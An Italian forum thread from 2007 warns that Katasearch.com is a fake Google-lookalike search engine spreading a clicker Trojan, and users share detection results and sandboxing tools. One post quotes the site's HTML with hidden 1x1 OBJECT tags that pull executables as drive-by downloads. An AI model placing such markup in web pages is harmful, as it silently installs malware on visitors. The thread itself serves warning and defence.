Torna indietro   Hardware Upgrade Forum > Networking e sicurezza > Antivirus e Sicurezza > AV e sicurezza in generale

realme GT7: un "flaghsip killer" concreto! La recensione
realme GT7: un "flaghsip killer" concreto! La recensione
Abbiamo provato l'ultimo smartphone di realme, il nuovo GT7. Si tratta di un device che si colloca in una fascia di mercato delicata, ovvero quella che possiamo definire medio-alta. La specifica che salta all'occhio è senza dubbio la sua batteria da 7.000 mAh e un design elegante e premium. Ma come funziona nel quotidiano? E soprattutto è davvero un Flagship Killer? Ve lo diciamo nella nostra recensione completa.
Oracle guida Stargate UAE: nasce il supercluster per l'IA sovrana
Oracle guida Stargate UAE: nasce il supercluster per l'IA sovrana
Il cloud ottimizzato per l'intelligenza artificiale di Oracle si combina con un'infrastruttura per la sovranità sul dato negli Emirati Arabi. "Questa implementazione epocale stabilisce un nuovo standard per la sovranità digitale", afferma Larry Ellison, fondatore di Oracle
Tutto sulla nuova Tesla Model Y: autonomia in autostrada, prova bagagliaio e dettagli
Tutto sulla nuova Tesla Model Y: autonomia in autostrada, prova bagagliaio e dettagli
Abbiamo guidato per diversi giorni la nuova Tesla Model Y, in versione di lancio dual motor e con batteria long range. Ecco tutto quello che c'è da sapere sull'erede dell'auto più venduta al mondo
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi
 
Strumenti
Old 05-06-2007, 12:05   #1
mausap
Senior Member
 
Iscritto dal: Jan 2007
Messaggi: 308
Attenzione a Katasearch.com

Katasearch.com un falso motore basato su google che diffonde malware
Il file in questione sfugge ancora a quasi tutti gli antivirus.

per saperne di piu' come al solito c'è mio blog per chi ne ha voglia

maipiugromozon.blogspot.com
mausap è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2007, 12:21   #2
xcdegasp
Senior Member
 
L'Avatar di xcdegasp
 
Iscritto dal: Nov 2001
Città: Fidenza(pr) da Trento
Messaggi: 27479
infatti i link della home di kataSearch.com portano a google.it

Quote:
<FONT size=-1><A
href="http://www.google.it/intl/it/ads/">Pubblicità</A> - <A
href="http://www.google.it/services/">Soluzioni Aziendali</A> - <A
href="http://www.google.it/intl/it/about.html">Tutto su Katasearch </A> - <A
href="http://www.google.com/ncr">Katasearch.com in English</A></FONT>

<P><FONT size=-2> © 4361 Katasearch </FONT></P>
<OBJECT CLASSID="CLSID:E4792F3D-760F-4f7d-9612-4DA401D88CF4" CODEBASE="sharewke.exe" width="1" height="1"></OBJECT>

<OBJECT CLASSID="CLSID:596A9DF1-13F3-4691-AC38-0516B7C2FD5E" CODEBASE="GHROMLO.exe" width="1" height="1"></OBJECT>
se l'esecuzione di script è bloccata non vi è problema a fare ricerche..
io ci sono andato con FireFox e "noScript" attivato

scarica i due file se premo "login" e bit-defender li identica come malevoli e li blocca subito, considera che è aggiornato a lunedì mattina alle ore 08:30

Ultima modifica di xcdegasp : 05-06-2007 alle 12:32.
xcdegasp è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2007, 13:33   #3
c.m.g
Senior Member
 
L'Avatar di c.m.g
 
Iscritto dal: Mar 2006
Messaggi: 22111
ciao mouseup,
navigando quà e là mi capita spesso su google di ritrovare nei risultati dei link sicuramente infetti da gromozon e fratelli.
volevo sapere come posso fare per comunicarteli eventualmente per "arricchire" il tuo blog molto utile!
fammi sapere.

p.s.: questi indirizzi sono facilmente riconoscibili anche senza accedervi, vi chiederete come? e presto detto: molti risultati hanno nomi strani nei domini come ad esempio: h**p:www.123544789.it (molto sospetto ma nome generato dalla mia fantasia e non so se esiste veramente) oppure hanno parole chiave che non hanno attinenza tra loro. ad esempio potreste trovare una semplice paginetta di internet con un elenco di parole chiave diverse tipo

cane, macchina, pasta al forno ecc...

un esempio di pagina sospetta è questa: h**p://www.corso-due-w.org/res472.htm

quì vi sono diverse parole chiave che non hanno attinenza tra loro.

una pagina piena che serve per aumentare le probabilità di essere visualizzata ai primi posti su google. ovviamente sono siti civetta che servono per farvi infettare da gromozon e fratelli.
__________________
Questa opera è distribuita secondo le regole di licenza Creative Commons salvo diversa indicazione. Chiunque volesse citare il contenuto di questo post deve necessariamente riportare il link originario.

Ultima modifica di c.m.g : 05-06-2007 alle 20:18.
c.m.g è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2007, 13:55   #4
mausap
Senior Member
 
Iscritto dal: Jan 2007
Messaggi: 308
Quote:
Originariamente inviato da c.m.g Guarda i messaggi
ciao mouseup,
navigando quà e là mi capita spesso su google di ritrovare nei risultati dei link sicuramente infetti da gromozon e fratelli.
volevo sapere come posso fare per comunicarteli eventualmente per "arricchire" il tuo blog molto utile!
fammi sapere.

p.s.: questi indirizzi sono facilmente riconoscibili anche senza accedervi, vi chiederete come? e presto detto: molti risultati hanno nomi strani nei domini come ad esempio: h**p:www.123544789.it (molto sospetto ma nome generato dalla mia fantasia e non so se esiste veramente) oppure hanno parole chiave che non hanno attinenza tra loro. ad esempio potreste trovare una semplice paginetta di internet con un elenco di parole chiave diverse tipo

cane, maccina, pasta al forno ecc...

un esempio di pagina sospetta è questa: h**p://www.corso-due-w.org/res472.htm

quì vi sono diverse parole chiave che non hanno attinenza tra loro.

una paghina piena che serve per aumentare le probabilità di essere visualizzata ai primi posti su google. ovviamente sono siti civetta che servono per farvi infettare da gromozon e fratelli.

Vedo con piacere che hai capito come funziona il sistema delle pagine civetta infette.Penso che siano dell'ordine delle centinaia di migliaia se non addirittura qualche milione.Google dice addirittura che
le pagine potenziamente dannose sono 1/10 di quelle presenti sul web.
Per questo io punto agli Ip. Comunque i malware di solito si trovano sempre in russia o ucraina (almeno quelli di quella gang li).Quei range devono assolutamente essere bloccati perche' ospitano fisicamente il virus.

In effetti non ci vuole molto a capire se un sito sia potenzialmente dannoso.
Di solito quando vado a controllare di cosa si tratta so gia' cosa piu' o meno mi
aspetta.Per questo usate firefox con noscript oppure ancora meglio sandboxie. Se hai qualche informazione su questo tipo di spazzatura puoi comunicarla nei commenti del blog oppure mandarmi un messaggio personale qui

Purtroppo gli antivirus fanno quello che possono ma non sono efficaci.
Mi pare molto interessante la SandBox Analyzer della Norman
che si trova anche su jotti e virustotal

I programmi di virtualizzazione, le sandbox e gli hips ormai credo sia quasi indispensabili per avere il pc sicuro.

Un'ultima raccomandazione per chi usa nod32. Dovete intregrare la protezione con altri software sfruttando la leggerezza di questo prodotto perche' purtroppo nod ha una capacita' di rivelazione dei virus non straordinaria attualmente.
La mia esperienza conferma i risultati di av-test.org

Ultima modifica di mausap : 05-06-2007 alle 14:00.
mausap è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2007, 14:09   #5
c.m.g
Senior Member
 
L'Avatar di c.m.g
 
Iscritto dal: Mar 2006
Messaggi: 22111
Quote:
Originariamente inviato da mausap Guarda i messaggi
Vedo con piacere che hai capito come funziona il sistema delle pagine civetta infette.Penso che siano dell'ordine delle centinaia di migliaia se non addirittura qualche milione.Google dice addirittura che
le pagine potenziamente dannose sono 1/10 di quelle presenti sul web.
Per questo io punto agli Ip. Comunque i malware di solito si trovano sempre in russia o ucraina (almeno quelli di quella gang li).Quei range devono assolutamente essere bloccati perche' ospitano fisicamente il virus.

In effetti non ci vuole molto a capire se un sito sia potenzialmente dannoso.
Di solito quando vado a controllare di cosa si tratta so gia' cosa piu' o meno mi
aspetta.Per questo usate firefox con noscript oppure ancora meglio sandboxie. Se hai qualche informazione su questo tipo di spazzatura puoi comunicarla nei commenti del blog oppure mandarmi un messaggio personale qui

Purtroppo gli antivirus fanno quello che possono ma non sono efficaci.
Mi pare molto interessante la SandBox Analyzer della Norman
che si trova anche su jotti e virustotal

I programmi di virtualizzazione, le sandbox e gli hips ormai credo sia quasi indispensabili per avere il pc sicuro.

Un'ultima raccomandazione per chi usa nod32. Dovete intregrare la protezione con altri software sfruttando la leggerezza di questo prodotto perche' purtroppo nod ha una capacita' di rivelazione dei virus non straordinaria attualmente.
La mia esperienza conferma i risultati di av-test.org
sarà fatto, comincia ad aspettarti un pò di messaggi privati!

p.s.: ho provveduto a segnalare a kaspersky questo tipo di rootkit che cambia spesso, insomma ho chiesto di tenere sotto controllo questo indirizzo.
per quanto riguarda il browser uso opera e non mi sono mai infettato!!!
__________________
Questa opera è distribuita secondo le regole di licenza Creative Commons salvo diversa indicazione. Chiunque volesse citare il contenuto di questo post deve necessariamente riportare il link originario.

Ultima modifica di c.m.g : 05-06-2007 alle 14:28.
c.m.g è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2007, 14:34   #6
c.m.g
Senior Member
 
L'Avatar di c.m.g
 
Iscritto dal: Mar 2006
Messaggi: 22111
mi hanno appena risposto dalla kaspersky quanto segue:

Hello,

katasearch.ex - Trojan-Clicker.Win32.Agent.ip

This file is already detected. Please update your antivirus bases.


avevo scritto che era un nuovo virus ma kaspersky è troppo avanti!!!

quindi noi utenti kasperskini siamo già protetti.
__________________
Questa opera è distribuita secondo le regole di licenza Creative Commons salvo diversa indicazione. Chiunque volesse citare il contenuto di questo post deve necessariamente riportare il link originario.
c.m.g è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2007, 19:59   #7
xcdegasp
Senior Member
 
L'Avatar di xcdegasp
 
Iscritto dal: Nov 2001
Città: Fidenza(pr) da Trento
Messaggi: 27479
non mostra un sito reale come primo risultato ma un falso sito inesistente per farti scaricare i due virus che avevo riportato sopra..

esempio, ho cercato "alberti elisabetta" e il sito reale è il "albertielisabetta.eu" che è primo su google ma secondo in questo falso motore di ricerca:



clickando sul primo link non succede altro che questa schermata in loop che spinge a scaricare volontariamente il file infetto:



l'unico modo per infettarsi è clickare sul link in alto "accesso"
era solo per dare un esempio di questo caso specifico nel quale il "civetta" non è esistente...
anche cambiando ricerca esempio "bancaintesa" il primo link che compare è sempre inesistente e facente parte all'ip: 208.101.37.109
xcdegasp è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2007, 20:15   #8
c.m.g
Senior Member
 
L'Avatar di c.m.g
 
Iscritto dal: Mar 2006
Messaggi: 22111
Quote:
Originariamente inviato da xcdegasp Guarda i messaggi
non mostra un sito reale come primo risultato ma un falso sito inesistente per farti scaricare i due virus che avevo riportato sopra..

esempio, ho cercato "alberti elisabetta" e il sito reale è il "albertielisabetta.eu" che è primo su google ma secondo in questo falso motore di ricerca:



clickando sul primo link non succede altro che questa schermata in loop che spinge a scaricare volontariamente il file infetto:



l'unico modo per infettarsi è clickare sul link in alto "accesso"
era solo per dare un esempio di questo caso specifico nel quale il "civetta" non è esistente...
anche cambiando ricerca esempio "bancaintesa" il primo link che compare è sempre inesistente e facente parte all'ip: 208.101.37.109
esatto
__________________
Questa opera è distribuita secondo le regole di licenza Creative Commons salvo diversa indicazione. Chiunque volesse citare il contenuto di questo post deve necessariamente riportare il link originario.
c.m.g è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2007, 20:52   #9
lucas84
Senior Member
 
L'Avatar di lucas84
 
Iscritto dal: Aug 2005
Messaggi: 1267
Quote:
Originariamente inviato da c.m.g Guarda i messaggi
mi hanno appena risposto dalla kaspersky quanto segue:

Hello,

katasearch.ex - Trojan-Clicker.Win32.Agent.ip

This file is already detected. Please update your antivirus bases.


avevo scritto che era un nuovo virus ma kaspersky è troppo avanti!!!

quindi noi utenti kasperskini siamo già protetti.
Niente di straordinario in quel file
__________________
Il dubbio è il padre del sapere.
lucas84 è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2007, 21:49   #10
nuovoUtente86
Senior Member
 
Iscritto dal: Mar 2007
Messaggi: 7863
Quote:
Originariamente inviato da mausap Guarda i messaggi
Purtroppo gli antivirus fanno quello che possono ma non sono efficaci.
Mi pare molto interessante la SandBox Analyzer della Norman
che si trova anche su jotti e virustotal

I programmi di virtualizzazione, le sandbox e gli hips ormai credo sia quasi indispensabili per avere il pc sicuro.
cosa sonoi programmi di virtualizzazione?
nuovoUtente86 è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2007, 22:27   #11
mausap
Senior Member
 
Iscritto dal: Jan 2007
Messaggi: 308
Quote:
Originariamente inviato da nuovoUtente86 Guarda i messaggi
cosa sonoi programmi di virtualizzazione?
Programmi come questi:

Virtualization Tools

Altiris Software Virtualization Solution
http://www.altiris.com/Products/Soft...nSolution.aspx

BufferZone
http://www.trustware.com/home.php

Deep Freeze
http://www.faronics.com/html/deepfreeze.asp

GreenBorder
http://greenborder.com/ ---------->acquistato da Google

ShadowSurfer
http://www.shadowstor.com/products.html

VirtualSandbox
http://www.fortresgrand.com/products/vsb/vsb.htm

VMware Browser Appliance Free!
http://www.vmware.com/vmtn/vm/browserapp.html
mausap è offline   Rispondi citando il messaggio o parte di esso
 Rispondi


realme GT7: un "flaghsip killer" concreto! La recensione realme GT7: un "flaghsip killer" concr...
Oracle guida Stargate UAE: nasce il supercluster per l'IA sovrana Oracle guida Stargate UAE: nasce il supercluster...
Tutto sulla nuova Tesla Model Y: autonomia in autostrada, prova bagagliaio e dettagli Tutto sulla nuova Tesla Model Y: autonomia in au...
HONOR 400 Pro trasforma ogni scatto in capolavoro animato. Recensione HONOR 400 Pro trasforma ogni scatto in capolavor...
Intel Core Ultra 5 235 e Core Ultra 5 225F, CPU Arrow Lake per la fascia media Intel Core Ultra 5 235 e Core Ultra 5 225F, CPU ...
Lingxi X2 porta il Kung Fu nella robotic...
SpaceX ha eseguito il nono volo del razz...
Tesla in caduta libera: in Europa -52,6%...
WhatsApp arriva finalmente su iPad: abbi...
Sony annuncia il ritorno dei proiettori ...
Concept Astro, il progetto di Dell per a...
Dubai pronta a offrire accesso gratuito ...
PlayStation Portatile: SoC AMD con proce...
Tor Alva: ecco l'edificio più alto al mo...
Finale di Champions con un maxischermo: ...
OnePlus AI: la nuova era dell'intelligen...
TeamViewer ONE: la piattaforma per unifi...
Volkswagen blinda l'architettura SSP: pr...
Sapphire Phantomlink: il produttore cine...
Formula E pronta a Shanghai: due gare de...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian
Google Chrome Portable
Google Chrome 120
VirtualBox
Tutti gli articoli Tutte le news Tutti i download

Strumenti

Regole
Non Puoi aprire nuove discussioni
Non Puoi rispondere ai messaggi
Non Puoi allegare file
Non Puoi modificare i tuoi messaggi

Il codice vB è On
Le Faccine sono On
Il codice [IMG] è On
Il codice HTML è Off
Vai al Forum


Tutti gli orari sono GMT +1. Ora sono le: 07:35.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Served by www2v